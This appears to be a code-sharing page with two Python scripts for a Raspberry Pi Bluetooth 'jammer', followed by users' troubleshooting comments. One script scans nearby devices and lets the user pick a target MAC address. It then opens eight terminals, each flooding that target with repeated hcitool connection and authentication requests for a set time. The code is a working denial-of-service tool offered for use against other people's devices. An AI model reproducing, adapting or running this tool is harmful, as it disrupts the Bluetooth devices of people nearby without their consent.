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| # I got all in /home/pi - change directories if put somewhere else | |
| import time | |
| import os | |
| path = '/home/pi/mac.txt' | |
| mac_file = open(path, 'r') | |
| attackmac = mac_file.read() | |
| path = '/home/pi/attacktime.txt' | |
| atk_file = open(path, 'r') | |
| attacktime = atk_file.read() | |
| attacktimeint = int(attacktime) | |
| timeout = time.time() + attacktimeint | |
| while True: | |
| os.system("sudo hcitool cc --role=m "+ attackmac) | |
| os.system("sudo hcitool auth "+ attackmac ) | |
| if time.time() > timeout: | |
| break |
| # I got all in /home/pi - change directories if put somewhere else | |
| import bluetooth | |
| import sys | |
| import serial | |
| import os | |
| import time | |
| import subprocess | |
| attacktime = 1*60 #one minute, you can change that | |
| attacktimestr = str(attacktime) | |
| path = '/home/pi/attacktime.txt' #you need to create this file, I've been to lazy letting it create one and then check every time if its there | |
| atk_file = open(path, 'w') | |
| atk_file.write(attacktimestr) | |
| atk_file.close() | |
| #scanning for bluetooth devices | |
| os.system("sudo hcitool scan --length=3") | |
| print("") | |
| #inquiring bluetooth devices, used to key out mac adress | |
| cmd = ["hcitool", "inq"] | |
| proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) | |
| output, _ = proc.communicate() | |
| newoutput = "" | |
| newoutput = str(output) | |
| print("1:",(newoutput[19:36])) | |
| mac1=(newoutput[19:36]) | |
| print("2:",(newoutput[79:96])) | |
| mac2=(newoutput[79:96]) | |
| print("3:",(newoutput[139:156])) | |
| mac3=(newoutput[139:156]) | |
| print("4:",(newoutput[199:216])) | |
| mac4=(newoutput[199:216]) | |
| print("5:",(newoutput[259:276])) | |
| mac5=(newoutput[259:276]) | |
| print("6:",(newoutput[319:336])) | |
| mac6=(newoutput[319:336]) | |
| print("7:",(newoutput[379:396])) | |
| mac7=(newoutput[379:396]) | |
| print("8:",(newoutput[439:456])) | |
| mac8=(newoutput[439:456]) | |
| print("9:",(newoutput[499:516])) | |
| mac9=(newoutput[499:516]) | |
| print("") | |
| print("c-cancel") | |
| userinput = input('which MAC (1-9 or "c"):') | |
| print(userinput) | |
| #handle for user input | |
| if userinput == "c": | |
| os.system("clear") | |
| os.system("quit()") | |
| elif userinput == "1": | |
| attackmac = mac1 | |
| elif userinput == "2": | |
| attackmac = mac2 | |
| elif userinput == "3": | |
| attackmac = mac3 | |
| elif userinput == "4": | |
| attackmac = mac4 | |
| elif userinput == "5": | |
| attackmac = mac5 | |
| elif userinput == "6": | |
| attackmac = mac6 | |
| elif userinput == "7": | |
| attackmac = mac7 | |
| elif userinput == "8": | |
| attackmac = mac8 | |
| elif userinput == "9": | |
| attackmac = mac9 | |
| path = '/home/pi/mac.txt' #you need to create this file, I've been to lazy letting it create one and then check every time if its there | |
| mac_file = open(path, 'w') | |
| mac_file.write(attackmac) | |
| mac_file.close() | |
| command=("python3 autospam.py") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| os.system("lxterminal --command=" + "'" + command + "'" + "&") | |
| a = input("just hit enter to close, its to find errors ") |
robertosw
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Dec 11, 2020
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Ok maybe do you have a img that run ? I only need the Bluetooth jammer program from you 😊
Regards
Yes no Problem 😊 i will try in the meantime a new build rpi linux
please download bt-block.py again, I changed something. That should help with the cancel problem
Ok i will download it again and reply to you
Regards
To the picture: please find out what the console is called on the OS you are using. lxterminal is the command on a raspberry pi. Maybe test out in the console to find the command which opens a new console window.
Second Problem of not finding something else then your TV: is your device connected to your TV? if so, then thats a problem with the way your devices is searching for new bluetooth devices, thats impossible to fix for me
I have to test again more exactly but I use standard ssh terminal programs like termius or shelly. ok that means you can only block bt with it when the devices are in pairing mode?
Regards
Hello all,
I don't get anz error but I also don't get any mac adress. Does somebody know why?



